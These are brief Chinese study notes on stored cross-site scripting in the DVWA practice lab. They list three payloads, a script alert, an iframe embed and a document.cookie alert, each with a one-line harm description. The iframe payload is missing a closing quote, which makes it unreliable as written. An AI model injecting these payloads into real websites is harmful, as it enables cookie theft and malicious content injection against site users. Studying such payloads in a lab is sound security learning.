dvwa笔记

存储型XSS

1. 基本的xss

<script>alert("hello")</script>

危害: 攻击者可以轻松的以中间人身份捕获 cookie/session。

2. iframe xss

<iframe src="http://www.baidu.com></iframe>

危害：攻击者可以在其中嵌入自己的恶意网页

3. cookie xss

<script>alert(document.cookie);</script>

危害：获取cookie等重要信息